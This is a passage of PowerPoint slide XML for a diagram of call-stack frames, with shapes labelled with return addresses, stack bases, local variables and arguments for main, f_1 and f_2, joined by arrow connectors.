                                      <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                      <a:t>Return address</a:t>
                                    </a:r>
                                    <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:endParaRPr>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="222" name="Shape 647">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED823AA6-C30A-49CB-9D43-58DBD005826C}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650538" y="499537"/>
                                    <a:ext cx="1704489" cy="270722"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:schemeClr val="accent6">
                                      <a:lumMod val="60000"/>
                                      <a:lumOff val="40000"/>
                                    </a:schemeClr>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent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000" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>main</a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                      <a:t>’s stackbase</a:t>
                                    </a:r>
                                    <a:endParaRPr sz="1000" b="1" dirty="0"/>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="223" name="Shape 648">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD8BA021-754E-49A6-95FD-AF6FD51085F8}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650539" y="1037363"/>
                                    <a:ext cx="1704489" cy="270721"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:srgbClr val="FFFFFF"/>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent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b="1" dirty="0"/>
                                      <a:t>arg1_m~arg1_1</a:t>
                                    </a:r>
                                    <a:endParaRPr lang="en" sz="1000" b="1" dirty="0"/>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="224" name="Shape 620">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1608695-5675-4B4A-A9FF-6326DD7E3B3B}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650537" y="1304738"/>
                                    <a:ext cx="1704490" cy="270721"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:schemeClr val="accent5">
                                      <a:lumMod val="60000"/>
                                      <a:lumOff val="40000"/>
                                    </a:schemeClr>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent1">
                                        <a:lumMod val="50000"/>
                                      </a:schemeClr>
                                    </a:solidFill>
                                    <a:prstDash val="solid"/>
                                    <a:round/>
                                    <a:headEnd type="none" w="sm" len="sm"/>
                                    <a:tailEnd type="none" w="sm" len="sm"/>
                                  </a:ln>
                                </p:spPr>
                                <p:txBody>
                                  <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                                    <a:noAutofit/>
                                  </a:bodyPr>
                                  <a:lstStyle/>
                                  <a:p>
                                    <a:pPr algn="ctr"/>
                                    <a:r>
                                      <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                      <a:t>Return address = </a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:srgbClr val="FF0000"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>addr1</a:t>
                                    </a:r>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="225" name="Shape 649">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{933460E1-8513-4F88-8866-87B26A7D4818}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650539" y="1575460"/>
                                    <a:ext cx="1704489" cy="267376"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:schemeClr val="accent6">
                                      <a:lumMod val="60000"/>
                                      <a:lumOff val="40000"/>
                                    </a:schemeClr>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent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000" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>f_1</a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                      <a:t>’s stackbase = </a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:srgbClr val="FF0000"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>addr15 </a:t>
                                    </a:r>
                                    <a:endParaRPr sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:srgbClr val="FF0000"/>
                                      </a:solidFill>
                                    </a:endParaRPr>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="226" name="Shape 650">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148AC287-A81C-486F-B77D-9FF7A0B7B31E}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650539" y="1842837"/>
                                    <a:ext cx="1704489" cy="267376"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:srgbClr val="F4CCCC"/>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent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b="1" dirty="0">
                                        <a:solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>f_1</a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                                      <a:t>’s local variables</a:t>
                                    </a:r>
                                    <a:endParaRPr sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:endParaRPr>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="227" name="Shape 651">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02EC6751-9102-47B5-A989-7DB281B55B1F}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650539" y="2110214"/>
                                    <a:ext cx="1704489" cy="262422"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:srgbClr val="FFFFFF"/>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent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b="1" dirty="0"/>
                                      <a:t>arg_k~arg_i</a:t>
                                    </a:r>
                                    <a:endParaRPr sz="1000" b="1" dirty="0"/>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="230" name="Shape 650">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C16896-9EDD-4B62-9825-ECDF4F27ED65}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650538" y="769985"/>
                                    <a:ext cx="1704489" cy="272859"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:srgbClr val="F4CCCC"/>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent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000" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>main</a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                                      <a:t>’s local variables</a:t>
                                    </a:r>
                                    <a:endParaRPr sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:endParaRPr>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="238" name="Shape 651">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67DE12C9-1884-467D-94B7-31E68F47F476}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7645479" y="2566262"/>
                                    <a:ext cx="1704489" cy="267376"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:schemeClr val="accent5">
                                      <a:lumMod val="60000"/>
                                      <a:lumOff val="40000"/>
                                    </a:schemeClr>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent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b="1" dirty="0"/>
                                      <a:t>Return address = </a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:srgbClr val="FF0000"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>addr2</a:t>
                                    </a:r>
                                    <a:endParaRPr sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:srgbClr val="FF0000"/>
                                      </a:solidFill>
                                    </a:endParaRPr>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="239" name="Shape 649">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4045D44-7A35-4E41-BD78-B057C7517659}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7645479" y="2835534"/>
                                    <a:ext cx="1704489" cy="267376"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:schemeClr val="accent6">
                                      <a:lumMod val="60000"/>
                                      <a:lumOff val="40000"/>
                                    </a:schemeClr>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent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000" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>f_2</a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                                      <a:t>’s stackbase = </a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:srgbClr val="FF0000"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>addr11</a:t>
                                    </a:r>
                                    <a:endParaRPr sz="1000" b="1" dirty="0">
                                      <a:solidFill>
                                        <a:srgbClr val="FF0000"/>
                                      </a:solidFill>
                                    </a:endParaRPr>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                            </p:grpSp>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="237" name="Shape 650">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33031E4C-6C6D-4D9D-A689-F6AAC90DE3AD}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7646056" y="3102103"/>
                                  <a:ext cx="1703912" cy="267376"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:srgbClr val="F4CCCC"/>
                                </a:solidFill>
                                <a:ln w="9525" cap="flat" cmpd="sng">
                                  <a:solidFill>
                                    <a:schemeClr val="accent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b="1" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:rPr>
                                    <a:t>f_2</a:t>
                                  </a:r>
                                  <a:r>
                                    <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                                    <a:t>’s local variables</a:t>
                                  </a:r>
                                  <a:endParaRPr sz="1000" b="1" dirty="0">
                                    <a:solidFill>
                                      <a:schemeClr val="accent5"/>
                                    </a:solidFill>
                                  </a:endParaRPr>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                          </p:grpSp>
                        </p:grpSp>
                      </p:grpSp>
                    </p:grpSp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="191" name="Shape 636">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9914ACC0-A35F-479C-B90C-7C5E78405924}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7054498" y="3157786"/>
                          <a:ext cx="1294649" cy="246846"/>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000" dirty="0">
                              <a:latin typeface="Consolas"/>
                              <a:ea typeface="Consolas"/>
                              <a:cs typeface="Consolas"/>
                              <a:sym typeface="Consolas"/>
                            </a:rPr>
                            <a:t>addr6</a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" dirty="0">
                            <a:latin typeface="Consolas"/>
                            <a:ea typeface="Consolas"/>
                            <a:cs typeface="Consolas"/>
                            <a:sym typeface="Consolas"/>
                          </a:endParaRPr>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                  </p:grpSp>
                </p:grpSp>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="165" name="组合 164">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B1EC7A-5BC1-4A26-9542-82731577A37A}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvGrpSpPr/>
                    <p:nvPr/>
                  </p:nvGrpSpPr>
                  <p:grpSpPr>
                    <a:xfrm>
                      <a:off x="3799227" y="3881328"/>
                      <a:ext cx="1373352" cy="353348"/>
                      <a:chOff x="6973673" y="1716631"/>
                      <a:chExt cx="1373352" cy="353348"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:cxnSp>
                    <p:nvCxnSpPr>
                      <p:cNvPr id="169" name="Shape 640">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6B8AA7B-4BCF-4FC6-B6D9-91A21303EDC7}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvCxnSpPr>
                        <a:cxnSpLocks/>
                      </p:cNvCxnSpPr>
                      <p:nvPr/>
                    </p:nvCxnSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6973673" y="1963523"/>
                        <a:ext cx="690098" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="accent1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:prstDash val="solid"/>
                        <a:round/>
                        <a:headEnd type="none" w="med" len="med"/>
                        <a:tailEnd type="triangle" w="med" len="med"/>
                      </a:ln>
                    </p:spPr>
                  </p:cxnSp>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="173" name="Shape 636">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9307602-810A-4E2F-972D-F6961A3466E4}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvSpPr/>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="7054498" y="1716631"/>
                        <a:ext cx="1292527" cy="353348"/>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000" dirty="0">
                            <a:latin typeface="Consolas"/>
                            <a:ea typeface="Consolas"/>
                            <a:cs typeface="Consolas"/>
                            <a:sym typeface="Consolas"/>
                          </a:rPr>
                          <a:t>addr9</a:t>
                        </a:r>
                        <a:endParaRPr sz="1000" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:endParaRPr>
                      </a:p>
                    </p:txBody>
                  </p:sp>
                </p:grpSp>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="166" name="Shape 636">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07330A51-F1F7-48E5-81E4-10A9223AA313}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="3880171" y="2984842"/>
                      <a:ext cx="1287214" cy="38944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000" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>addr13</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </p:txBody>
                </p:sp>
              </p:grpSp>
            </p:grpSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="346" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F3B6BD9-CF3C-432A-AE8D-AB879C70089B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="238" idx="3"/>
                  <a:endCxn id="497" idx="1"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="6045797" y="3337818"/>
                  <a:ext cx="774292" cy="1087658"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
              <p:style>
                <a:lnRef idx="1">
                  <a:schemeClr val="accent5"/>
                </a:lnRef>
                <a:fillRef idx="0">
                  <a:schemeClr val="accent5"/>
                </a:fillRef>
                <a:effectRef idx="0">
                  <a:schemeClr val="accent5"/>
                </a:effectRef>
                <a:fontRef idx="minor">
                  <a:schemeClr val="tx1"/>
                </a:fontRef>
              </p:style>
            </p:cxnSp>
          </p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="91" name="组合 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFFE4A76-EE2B-45CE-B822-DDA5E8234B9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3692616" y="2673726"/>
              <a:ext cx="1333979" cy="1782645"/>
              <a:chOff x="3692616" y="2673726"/>
              <a:chExt cx="1333979" cy="1782645"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="406" name="组合 405">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF9FC39C-9556-4682-A665-3A0FC122409E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3697040" y="4120663"/>
                <a:ext cx="1329555" cy="335708"/>
                <a:chOff x="6615347" y="308398"/>
                <a:chExt cx="1329555" cy="335708"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="407" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C115868C-16DE-4B81-A8F9-F5CF71798333}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6655811" y="308398"/>
                  <a:ext cx="1289091" cy="335708"/>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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr8</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="408" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{857491FD-1AF2-45DD-8F83-F9095D386048}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="409" name="组合 408">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B108A1-4AA7-449A-837F-C4AFE7E16C82}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3692616" y="3522553"/>
                <a:ext cx="1329554" cy="353347"/>
                <a:chOff x="6615347" y="290759"/>
                <a:chExt cx="1329554" cy="353347"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="410" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43CBE83E-D43E-4942-B9DC-E4549E595D3B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6660236" y="290759"/>
                  <a:ext cx="1284665" cy="353347"/>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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr10</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="411" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25C939AC-894E-4272-9878-00B2168C79EA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
